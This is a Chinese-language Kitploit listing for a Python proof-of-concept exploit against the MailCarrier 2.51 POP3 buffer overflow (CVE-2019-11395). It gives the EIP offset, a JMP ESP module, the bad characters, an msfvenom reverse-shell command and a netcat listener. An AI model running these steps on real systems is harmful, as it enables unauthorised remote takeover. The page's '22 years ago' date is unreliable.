Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-11395 — 针对CVE-2019-11395的Python利用程序,MailCarrier 2.51 POP3服务中的缓冲区溢出漏洞。通过msfvenom生成反向shell有效载荷,并在Windows目标上实现远程代码执行。 | Kitploit
工具/GitHubGitHub/caioprince/cve-2019-11395
Payload生成漏洞分析漏洞利用Shellcode渗透测试二进制利用
GitHubcaioprince/cve-2019-11395

CVE-2019-11395

针对CVE-2019-11395的Python利用程序,MailCarrier 2.51 POP3服务中的缓冲区溢出漏洞。通过msfvenom生成反向shell有效载荷,并在Windows目标上实现远程代码执行。

查看仓库
22年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-11395 漏洞利用 🛡️

关于 CVE-2019-11395 🕵️

CVE-2019-11395 漏洞描述了 MailCarrier 2.51 电子邮件应用程序中的缓冲区溢出漏洞,可导致远程代码执行。该漏洞出现在 SMTP RCPT TO、POP3 USER、POP3 LIST、POP3 TOP 或 POP3 RETR 进程中。

在学术研究过程中,重点关注了 POP3 进程以创建概念验证(PoC)。研究发现,向应用程序发送 6000 字节可导致其停止运行,从而揭示缓冲区溢出漏洞。

利用步骤 🔍

  1. 使用 msf-pattern_create -l 6000 精确定位 EIP。
  2. 通过 msf-pattern_offset -q 6E47386E -l 6000 确定 EIP 偏移量为 5095。
  3. 发现 expsrv.dll 禁用了 ASLR,适合用作 JMP ESP。
  4. 在无效字符测试中识别出坏字符 \x00\x0a\x0d。
  5. 使用 msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode 生成载荷。
  6. 调整 CVE-2019-11395.py 代码以容纳载荷。
  7. 使用 nc -lnvp 4444 打开连接,运行漏洞利用程序 (CVE-2019-11395.py) 以获取环境访问权限并验证所述 CVE。

使用方法 🚀

按照以下步骤使用漏洞利用程序:

  1. 使用 msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode 生成载荷。
  2. 复制 msfvenom 命令的输出。
  3. 调整 CVE-2019-11395.py 代码,将 shellcode 变量替换为从 msfvenom 命令获得的输出。
  4. 运行漏洞利用程序 (CVE-2019-11395.py) 以获取环境访问权限并验证所述 CVE。

攻陷环境截图 📸

CVE-2019-11395 概念验证

🔗 与我联系

访问我的 LinkedIn 个人资料

下载工具